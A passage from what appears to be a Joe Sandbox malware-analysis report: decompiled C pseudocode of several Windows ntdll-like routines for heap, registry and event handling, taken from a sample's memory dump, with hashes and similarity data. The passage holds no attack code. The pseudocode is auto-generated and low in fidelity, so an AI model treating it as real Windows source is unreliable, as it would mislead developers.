                    					_t74 = L01684620(_t107, _t107, _t72 + 0x180000, _t121);
                    					_v1064 = _t74;
                    					__eflags = _t74;
                    					if(_t74 == 0) {
                    						goto L60;
                    					}
                    					_t102 = _t74;
                    					_push( &_v1060);
                    					_push(_t121);
                    					_push(_t74);
                    					_push(2);
                    					_push( &_v1048);
                    					_push(_t116);
                    					_t122 = E016A9650();
                    					__eflags = _t122;
                    					if(_t122 >= 0) {
                    						L7:
                    						_t114 = _a12;
                    						__eflags = _t114;
                    						if(_t114 != 0) {
                    							_t77 = _a20;
                    							L26:
                    							_t109 =  *(_t102 + 4);
                    							__eflags = _t109 - 3;
                    							if(_t109 == 3) {
                    								L55:
                    								__eflags = _t114 - _t109;
                    								if(_t114 != _t109) {
                    									L59:
                    									_t122 = 0xc0000024;
                    									L15:
                    									_t78 = _v1052;
                    									__eflags = _t78;
                    									if(_t78 != 0) {
                    										L016877F0( *( *[fs:0x30] + 0x18), 0, _t78);
                    									}
                    									_t68 = _t122;
                    									goto L4;
                    								}
                    								_t110 = _v1056;
                    								_t118 =  *((intOrPtr*)(_t102 + 8));
                    								_v1060 = _t118;
                    								__eflags = _t110;
                    								if(_t110 == 0) {
                    									L10:
                    									_t122 = 0x80000005;
                    									L11:
                    									_t81 = _v1040;
                    									__eflags = _t81;
                    									if(_t81 == 0) {
                    										goto L15;
                    									}
                    									__eflags = _t122;
                    									if(_t122 >= 0) {
                    										L14:
                    										 *_t81 = _t118;
                    										goto L15;
                    									}
                    									__eflags = _t122 - 0x80000005;
                    									if(_t122 != 0x80000005) {
                    										goto L15;
                    									}
                    									goto L14;
                    								}
                    								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                    								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                    									goto L10;
                    								}
                    								_push( *((intOrPtr*)(_t102 + 8)));
                    								_t59 = _t102 + 0xc; // 0xc
                    								_push(_t110);
                    								L54:
                    								E016AF3E0();
                    								_t125 = _t125 + 0xc;
                    								goto L11;
                    							}
                    							__eflags = _t109 - 7;
                    							if(_t109 == 7) {
                    								goto L55;
                    							}
                    							_t118 = 4;
                    							__eflags = _t109 - _t118;
                    							if(_t109 != _t118) {
                    								__eflags = _t109 - 0xb;
                    								if(_t109 != 0xb) {
                    									__eflags = _t109 - 1;
                    									if(_t109 == 1) {
                    										__eflags = _t114 - _t118;
                    										if(_t114 != _t118) {
                    											_t118 =  *((intOrPtr*)(_t102 + 8));
                    											_v1060 = _t118;
                    											__eflags = _t118 - _t77;
                    											if(_t118 > _t77) {
                    												goto L10;
                    											}
                    											_push(_t118);
                    											_t56 = _t102 + 0xc; // 0xc
                    											_push(_v1056);
                    											goto L54;
                    										}
                    										__eflags = _t77 - _t118;
                    										if(_t77 != _t118) {
                    											L34:
                    											_t122 = 0xc0000004;
                    											goto L15;
                    										}
                    										_t111 = _v1056;
                    										__eflags = _t111 & 0x00000003;
                    										if((_t111 & 0x00000003) == 0) {
                    											_v1060 = _t118;
                    											__eflags = _t111;
                    											if(__eflags == 0) {
                    												goto L10;
                    											}
                    											_t42 = _t102 + 0xc; // 0xc
                    											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                    											_v1048 =  *((intOrPtr*)(_t102 + 8));
                    											_push(_t111);
                    											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                    											_push(0);
                    											_push( &_v1048);
                    											_t122 = E016A13C0(_t102, _t118, _t122, __eflags);
                    											L44:
                    											_t118 = _v1072;
                    											goto L11;
                    										}
                    										_t122 = 0x80000002;
                    										goto L15;
                    									}
                    									_t122 = 0xc0000024;
                    									goto L44;
                    								}
                    								__eflags = _t114 - _t109;
                    								if(_t114 != _t109) {
                    									goto L59;
                    								}
                    								_t118 = 8;
                    								__eflags = _t77 - _t118;
                    								if(_t77 != _t118) {
                    									goto L34;
                    								}
                    								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                    								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                    									goto L34;
                    								}
                    								_t112 = _v1056;
                    								_v1060 = _t118;
                    								__eflags = _t112;
                    								if(_t112 == 0) {
                    									goto L10;
                    								}
                    								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                    								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                    								goto L11;
                    							}
                    							__eflags = _t114 - _t118;
                    							if(_t114 != _t118) {
                    								goto L59;
                    							}
                    							__eflags = _t77 - _t118;
                    							if(_t77 != _t118) {
                    								goto L34;
                    							}
                    							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                    							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                    								goto L34;
                    							}
                    							_t113 = _v1056;
                    							_v1060 = _t118;
                    							__eflags = _t113;
                    							if(_t113 == 0) {
                    								goto L10;
                    							}
                    							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                    							goto L11;
                    						}
                    						_t118 =  *((intOrPtr*)(_t102 + 8));
                    						__eflags = _t118 - _a20;
                    						if(_t118 <= _a20) {
                    							_t114 =  *(_t102 + 4);
                    							_t77 = _t118;
                    							goto L26;
                    						}
                    						_v1060 = _t118;
                    						goto L10;
                    					}
                    					__eflags = _t122 - 0x80000005;
                    					if(_t122 != 0x80000005) {
                    						goto L15;
                    					}
                    					L016877F0( *( *[fs:0x30] + 0x18), 0, _t102);
                    					L18:
                    					_t121 = _v1060;
                    					goto L19;
                    				}
                    				_push( &_v1060);
                    				_push(0x400);
                    				_t102 =  &_v1036;
                    				_push(_t102);
                    				_push(2);
                    				_push( &_v1048);
                    				_push(_t116);
                    				_t122 = E016A9650();
                    				if(_t122 >= 0) {
                    					__eflags = 0;
                    					_v1052 = 0;
                    					goto L7;
                    				}
                    				if(_t122 == 0x80000005) {
                    					goto L18;
                    				}
                    				goto L4;
                    			}


                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ccf1f3b97a415ec82367ce5afe44b00662709306c387b8718748c11a871b658
                    • Instruction ID: bf00d90f91f536c3dbfa25641c924ee6e27fb74464aa66b8b8559664357622e4
                    • Opcode Fuzzy Hash: 7ccf1f3b97a415ec82367ce5afe44b00662709306c387b8718748c11a871b658
                    • Instruction Fuzzy Hash: DC81A176A042069BDB26CE58CC80A7A77E5FB84358F18486EEE45DB345D330ED41CBA3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0169138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
                    				void* _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* __ebx;
                    				signed int _t97;
                    				signed int _t102;
                    				void* _t105;
                    				char* _t112;
                    				signed int _t113;
                    				signed int _t117;
                    				signed int _t119;
                    				signed int* _t122;
                    				signed int _t124;
                    				signed int _t130;
                    				signed int _t136;
                    				char _t150;
                    				intOrPtr _t153;
                    				signed int _t161;
                    				signed int _t163;
                    				signed int _t170;
                    				signed int _t175;
                    				signed int _t176;
                    				signed int _t182;
                    				signed int* _t183;
                    				signed int* _t184;
                    
                    				_t182 = __ecx;
                    				_t153 = _a24;
                    				_t183 = __edx;
                    				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
                    				_t97 = _t153 - _a16;
                    				if(_t97 > 0xfffff000) {
                    					L19:
                    					return 0;
                    				}
                    				asm("cdq");
                    				_t150 = _a20;
                    				_v16 = _t97 / 0x1000;
                    				_t102 = _a4 + 0x00000007 & 0xfffffff8;
                    				_t170 = _t102 + __edx;
                    				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
                    				_t105 = _t170 + 0x28;
                    				_v12 = _t170;
                    				if(_t105 >= _t150) {
                    					if(_t105 >= _t153) {
                    						goto L19;
                    					}
                    					_v8 = _t170 - _t150 + 8;
                    					_push(E01690678(__ecx, 1));
                    					_push(0x1000);
                    					_push( &_v8);
                    					_push(0);
                    					_push( &_a20);
                    					_push(0xffffffff);
                    					if(E016A9660() < 0) {
                    						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
                    						goto L19;
                    					}
                    					if(E01687D50() == 0) {
                    						_t112 = 0x7ffe0380;
                    					} else {
                    						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    					}
                    					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    						E0172138A(_t150, _t182, _a20, _v8, 3);
                    					}
                    					_t150 = _a20 + _v8;
                    					_t153 = _a24;
                    					_a20 = _t150;
                    				}
                    				_t183[0] = 1;
                    				_t113 = _t153 - _t150;
                    				_t183[1] = 1;
                    				asm("cdq");
                    				_t175 = _t113 % 0x1000;
                    				_v28 = _t113 / 0x1000;
                    				 *_t183 = _v20;
                    				_t183[1] =  *(_t182 + 0x54);
                    				if((_v24 & 0x00001000) != 0) {
                    					_t117 = E016916C7(1, _t175);
                    					_t150 = _a20;
                    					_t183[0xd] = _t117;
                    				}
                    				_t183[0xb] = _t183[0xb] & 0x00000000;
                    				_t176 = _v12;
                    				_t183[3] = _a12;
                    				_t119 = _a16;
                    				_t183[7] = _t119;
                    				_t161 = _v16 << 0xc;
                    				_t183[6] = _t182;
                    				_t183[0xa] = _t119 + _t161;
                    				_t183[8] = _v16;
                    				_t122 =  &(_t183[0xe]);
                    				_t183[2] = 0xffeeffee;
                    				_t183[9] = _t176;
                    				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
                    				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
                    				_t122[1] = _t122;
                    				 *_t122 = _t122;
                    				if(_t183[6] != _t183) {
                    					_t124 = 1;
                    				} else {
                    					_t124 = 0;
                    				}
                    				_t183[1] = _t124;
                    				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
                    				if(_t183[6] != _t183) {
                    					_t130 = (_t176 - _t183 >> 0x10) + 1;
                    					_v24 = _t130;
                    					if(_t130 >= 0xfe) {
                    						_push(_t161);
                    						_push(0);
                    						E0172A80D(_t183[6], 3, _t176, _t183);
                    						_t150 = _a20;
                    						_t176 = _v12;
                    						_t130 = _v24;
                    					}
                    				} else {
                    					_t130 = 0;
                    				}
                    				 *(_t176 + 6) = _t130;
                    				E0168B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
                    				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
                    					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
                    					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
                    				}
                    				if(_v8 != 0) {
                    					E0168A830(_t182, _v12, _v8);
                    				}
                    				_t136 = _t182 + 0xa4;
                    				_t184 =  &(_t183[4]);
                    				_t163 =  *(_t136 + 4);
                    				if( *_t163 != _t136) {
                    					_push(_t163);
                    					_push( *_t163);
                    					E0172A80D(0, 0xd, _t136, 0);
                    				} else {
                    					 *_t184 = _t136;
                    					_t184[1] = _t163;
                    					 *_t163 = _t184;
                    					 *(_t136 + 4) = _t184;
                    				}
                    				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
                    				return 1;
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction ID: 03c87d3030544fd60df8d22ab085baae83d8502debd2e30e234597c2dad9857f
                    • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction Fuzzy Hash: BC819B75A003469FDB25CF68C844BAABBF9FF49310F24856AE956C7751D330EA41CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E016FB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                    				char _v8;
                    				signed int _v12;
                    				signed int _t80;
                    				signed int _t83;
                    				intOrPtr _t89;
                    				signed int _t92;
                    				signed char _t106;
                    				signed int* _t107;
                    				intOrPtr _t108;
                    				intOrPtr _t109;
                    				signed int _t114;
                    				void* _t115;
                    				void* _t117;
                    				void* _t119;
                    				void* _t122;
                    				signed int _t123;
                    				signed int* _t124;
                    
                    				_t106 = _a12;
                    				if((_t106 & 0xfffffffc) != 0) {
                    					return 0xc000000d;
                    				}
                    				if((_t106 & 0x00000002) != 0) {
                    					_t106 = _t106 | 0x00000001;
                    				}
                    				_t109 =  *0x1757b9c; // 0x0
                    				_t124 = L01684620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                    				if(_t124 != 0) {
                    					 *_t124 =  *_t124 & 0x00000000;
                    					_t124[1] = _t124[1] & 0x00000000;
                    					_t124[4] = _t124[4] & 0x00000000;
                    					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                    						L13:
                    						_push(_t124);
                    						if((_t106 & 0x00000002) != 0) {
                    							_push(0x200);
                    							_push(0x28);
                    							_push(0xffffffff);
                    							_t122 = E016A9800();
                    							if(_t122 < 0) {
                    								L33:
                    								if((_t124[4] & 0x00000001) != 0) {
                    									_push(4);
                    									_t64 =  &(_t124[1]); // 0x4
                    									_t107 = _t64;
                    									_push(_t107);
                    									_push(5);
                    									_push(0xfffffffe);
                    									E016A95B0();
                    									if( *_t107 != 0) {
                    										_push( *_t107);
                    										E016A95D0();
                    									}
                    								}
                    								_push(_t124);
                    								_push(0);
                    								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                    								L37:
                    								L016877F0();
                    								return _t122;
                    							}
                    							_t124[4] = _t124[4] | 0x00000002;
                    							L18:
                    							_t108 = _a8;
                    							_t29 =  &(_t124[0x105]); // 0x414
                    							_t80 = _t29;
                    							_t30 =  &(_t124[5]); // 0x14
                    							_t124[3] = _t80;
                    							_t123 = 0;
                    							_t124[2] = _t30;
                    							 *_t80 = _t108;
                    							if(_t108 == 0) {
                    								L21:
                    								_t112 = 0x400;
                    								_push( &_v8);
                    								_v8 = 0x400;
                    								_push(_t124[2]);
                    								_push(0x400);
                    								_push(_t124[3]);
                    								_push(0);
                    								_push( *_t124);
                    								_t122 = E016A9910();
                    								if(_t122 != 0xc0000023) {
                    									L26:
                    									if(_t122 != 0x106) {
                    										L40:
                    										if(_t122 < 0) {
                    											L29:
                    											_t83 = _t124[2];
                    											if(_t83 != 0) {
                    												_t59 =  &(_t124[5]); // 0x14
                    												if(_t83 != _t59) {
                    													L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                    												}
                    											}
                    											_push( *_t124);
                    											E016A95D0();
                    											goto L33;
                    										}
                    										 *_a16 = _t124;
                    										return 0;
                    									}
                    									if(_t108 != 1) {
                    										_t122 = 0;
                    										goto L40;
                    									}
                    									_t122 = 0xc0000061;
                    									goto L29;
                    								} else {
                    									goto L22;
                    								}
                    								while(1) {
                    									L22:
                    									_t89 =  *0x1757b9c; // 0x0
                    									_t92 = L01684620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                    									_t124[2] = _t92;
                    									if(_t92 == 0) {
                    										break;
                    									}
                    									_t112 =  &_v8;
                    									_push( &_v8);
                    									_push(_t92);
                    									_push(_v8);
                    									_push(_t124[3]);
                    									_push(0);
                    									_push( *_t124);
                    									_t122 = E016A9910();
                    									if(_t122 != 0xc0000023) {
                    										goto L26;
                    									}
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                    								}
                    								_t122 = 0xc0000017;
                    								goto L26;
                    							}
                    							_t119 = 0;
                    							do {
                    								_t114 = _t124[3];
                    								_t119 = _t119 + 0xc;
                    								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                    								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                    								_t123 = _t123 + 1;
                    								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                    							} while (_t123 < _t108);
                    							goto L21;
                    						}
                    						_push(0x28);
                    						_push(3);
                    						_t122 = E0166A7B0();
                    						if(_t122 < 0) {
                    							goto L33;
                    						}
                    						_t124[4] = _t124[4] | 0x00000001;
                    						goto L18;
                    					}
                    					if((_t106 & 0x00000001) == 0) {
                    						_t115 = 0x28;
                    						_t122 = E016FE7D3(_t115, _t124);
                    						if(_t122 < 0) {
                    							L9:
                    							_push(_t124);
                    							_push(0);
                    							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                    							goto L37;
                    						}
                    						L12:
                    						if( *_t124 != 0) {
                    							goto L18;
                    						}
                    						goto L13;
                    					}
                    					_t15 =  &(_t124[1]); // 0x4
                    					_t117 = 4;
                    					_t122 = E016FE7D3(_t117, _t15);
                    					if(_t122 >= 0) {
                    						_t124[4] = _t124[4] | 0x00000001;
                    						_v12 = _v12 & 0x00000000;
                    						_push(4);
                    						_push( &_v12);
                    						_push(5);
                    						_push(0xfffffffe);
                    						E016A95B0();
                    						goto L12;
                    					}
                    					goto L9;
                    				} else {
                    					return 0xc0000017;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fc638d8e3db476cf46472a4184f2c89928d3c55ba8898e7abc9d7841a9621c3
                    • Instruction ID: afbb34fdd342dec37f68e4f1080bb9771e14c48ccdcd224fe005d864e84f5e44
                    • Opcode Fuzzy Hash: 4fc638d8e3db476cf46472a4184f2c89928d3c55ba8898e7abc9d7841a9621c3
                    • Instruction Fuzzy Hash: 8571FE32200706AFE732DF18CC45F66BBE6EB44720F25452CEB558B6A0DB75E945CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E016E6DC9(signed int __ecx, void* __edx) {
                    				unsigned int _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				char _v44;
                    				char _v48;
                    				char _v52;
                    				char _v56;
                    				char _v60;
                    				void* _t87;
                    				void* _t95;
                    				signed char* _t96;
                    				signed int _t107;
                    				signed int _t136;
                    				signed char* _t137;
                    				void* _t157;
                    				void* _t161;
                    				void* _t167;
                    				intOrPtr _t168;
                    				void* _t174;
                    				void* _t175;
                    				signed int _t176;
                    				void* _t177;
                    
                    				_t136 = __ecx;
                    				_v44 = 0;
                    				_t167 = __edx;
                    				_v40 = 0;
                    				_v36 = 0;
                    				_v32 = 0;
                    				_v60 = 0;
                    				_v56 = 0;
                    				_v52 = 0;
                    				_v48 = 0;
                    				_v16 = __ecx;
                    				_t87 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                    				_t175 = _t87;
                    				if(_t175 != 0) {
                    					_t11 = _t175 + 0x30; // 0x30
                    					 *((short*)(_t175 + 6)) = 0x14d4;
                    					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                    					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                    					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                    					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                    					E016E6B4C(_t167, _t11, 0x214,  &_v8);
                    					_v12 = _v8 + 0x10;
                    					_t95 = E01687D50();
                    					_t137 = 0x7ffe0384;
                    					if(_t95 == 0) {
                    						_t96 = 0x7ffe0384;
                    					} else {
                    						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    					}
                    					_push(_t175);
                    					_push(_v12);
                    					_push(0x402);
                    					_push( *_t96 & 0x000000ff);
                    					E016A9AE0();
                    					_t87 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                    					_t176 = _v16;
                    					if((_t176 & 0x00000100) != 0) {
                    						_push( &_v36);
                    						_t157 = 4;
                    						_t87 = E016E795D( *((intOrPtr*)(_t167 + 8)), _t157);
                    						if(_t87 >= 0) {
                    							_v24 = E016E795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                    							_v28 = E016E795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                    							_push( &_v52);
                    							_t161 = 5;
                    							_t168 = E016E795D( *((intOrPtr*)(_t167 + 8)), _t161);
                    							_v20 = _t168;
                    							_t107 = L01684620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                    							_v16 = _t107;
                    							if(_t107 != 0) {
                    								_v8 = _v8 & 0x00000000;
                    								 *(_t107 + 0x20) = _t176;
                    								 *((short*)(_t107 + 6)) = 0x14d5;
                    								_t47 = _t107 + 0x24; // 0x24
                    								_t177 = _t47;
                    								E016E6B4C( &_v36, _t177, 0xc78,  &_v8);
                    								_t51 = _v8 + 4; // 0x4
                    								_t178 = _t177 + (_v8 >> 1) * 2;
                    								_v12 = _t51;
                    								E016E6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                    								_v12 = _v12 + _v8;
                    								E016E6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                    								_t125 = _v8;
                    								_v12 = _v12 + _v8;
                    								E016E6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                    								_t174 = _v12 + _v8;
                    								if(E01687D50() != 0) {
                    									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    								}
                    								_push(_v16);
                    								_push(_t174);
                    								_push(0x402);
                    								_push( *_t137 & 0x000000ff);
                    								E016A9AE0();
                    								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                    								_t168 = _v20;
                    							}
                    							_t87 = L01682400( &_v36);
                    							if(_v24 >= 0) {
                    								_t87 = L01682400( &_v44);
                    							}
                    							if(_t168 >= 0) {
                    								_t87 = L01682400( &_v52);
                    							}
                    							if(_v28 >= 0) {
                    								return L01682400( &_v60);
                    							}
                    						}
                    					}
                    				}
                    				return _t87;
                    			}
































                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction ID: 721a0a5a64c43bb60c8227dc5506574ef665973ab0f23b991d1dc8502a78457c
                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction Fuzzy Hash: A1717171A01219EFDB10DFA8CD44AEEBBF9FF58714F104569E505E7250EB30AA41CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E016652A5(char __ecx) {
                    				char _v20;
                    				char _v28;
                    				char _v29;
                    				void* _v32;
                    				void* _v36;
                    				void* _v37;
                    				void* _v38;
                    				void* _v40;
                    				void* _v46;
                    				void* _v64;
                    				void* __ebx;
                    				intOrPtr* _t49;
                    				signed int _t53;
                    				short _t85;
                    				signed int _t87;
                    				signed int _t88;
                    				signed int _t89;
                    				intOrPtr _t101;
                    				intOrPtr* _t102;
                    				intOrPtr* _t104;
                    				signed int _t106;
                    				void* _t108;
                    
                    				_t93 = __ecx;
                    				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                    				_push(_t88);
                    				_v29 = __ecx;
                    				_t89 = _t88 | 0xffffffff;
                    				while(1) {
                    					E0167EEF0(0x17579a0);
                    					_t104 =  *0x1758210; // 0x1202c70
                    					if(_t104 == 0) {
                    						break;
                    					}
                    					asm("lock inc dword [esi]");
                    					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                    					E0167EB70(_t93, 0x17579a0);
                    					if( *((char*)(_t108 + 0xf)) != 0) {
                    						_t101 =  *0x7ffe02dc;
                    						__eflags =  *(_t104 + 0x14) & 0x00000001;
                    						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                    							L9:
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0x90028);
                    							_push(_t108 + 0x20);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push( *((intOrPtr*)(_t104 + 4)));
                    							_t53 = E016A9890();
                    							__eflags = _t53;
                    							if(_t53 >= 0) {
                    								__eflags =  *(_t104 + 0x14) & 0x00000001;
                    								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                    									E0167EEF0(0x17579a0);
                    									 *((intOrPtr*)(_t104 + 8)) = _t101;
                    									E0167EB70(0, 0x17579a0);
                    								}
                    								goto L3;
                    							}
                    							__eflags = _t53 - 0xc0000012;
                    							if(__eflags == 0) {
                    								L12:
                    								_t13 = _t104 + 0xc; // 0x1202c7d
                    								_t93 = _t13;
                    								 *((char*)(_t108 + 0x12)) = 0;
                    								__eflags = E0169F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                    								if(__eflags >= 0) {
                    									L15:
                    									_t102 = _v28;
                    									 *_t102 = 2;
                    									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                    									E0167EEF0(0x17579a0);
                    									__eflags =  *0x1758210 - _t104; // 0x1202c70
                    									if(__eflags == 0) {
                    										__eflags =  *((char*)(_t108 + 0xe));
                    										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                    										 *0x1758210 = _t102;
                    										_t32 = _t102 + 0xc; // 0x0
                    										 *_t95 =  *_t32;
                    										_t33 = _t102 + 0x10; // 0x0
                    										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                    										_t35 = _t102 + 4; // 0xffffffff
                    										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                    										if(__eflags != 0) {
                    											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                    											E016E4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                    										}
                    										E0167EB70(_t95, 0x17579a0);
                    										asm("lock xadd [esi], eax");
                    										if(__eflags == 0) {
                    											_push( *((intOrPtr*)(_t104 + 4)));
                    											E016A95D0();
                    											L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                    										}
                    										asm("lock xadd [esi], ebx");
                    										__eflags = _t89 == 1;
                    										if(_t89 == 1) {
                    											_push( *((intOrPtr*)(_t104 + 4)));
                    											E016A95D0();
                    											L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                    										}
                    										_t49 = _t102;
                    										L4:
                    										return _t49;
                    									}
                    									E0167EB70(_t93, 0x17579a0);
                    									asm("lock xadd [esi], eax");
                    									if(__eflags == 0) {
                    										_push( *((intOrPtr*)(_t104 + 4)));
                    										E016A95D0();
                    										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                    										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                    									}
                    									 *_t102 = 1;
                    									asm("lock xadd [edi], eax");
                    									if(__eflags == 0) {
                    										_t28 = _t102 + 4; // 0xffffffff
                    										_push( *_t28);
                    										E016A95D0();
                    										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                    									}
                    									continue;
                    								}
                    								_t93 =  &_v20;
                    								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                    								_t85 = 6;
                    								_v20 = _t85;
                    								_t87 = E0169F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                    								__eflags = _t87;
                    								if(_t87 < 0) {
                    									goto L3;
                    								}
                    								 *((char*)(_t108 + 0xe)) = 1;
                    								goto L15;
                    							}
                    							__eflags = _t53 - 0xc000026e;
                    							if(__eflags != 0) {
                    								goto L3;
                    							}
                    							goto L12;
                    						}
                    						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                    						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                    							goto L3;
                    						} else {
                    							goto L9;
                    						}
                    					}
                    					L3:
                    					_t49 = _t104;
                    					goto L4;
                    				}
                    				_t49 = 0;
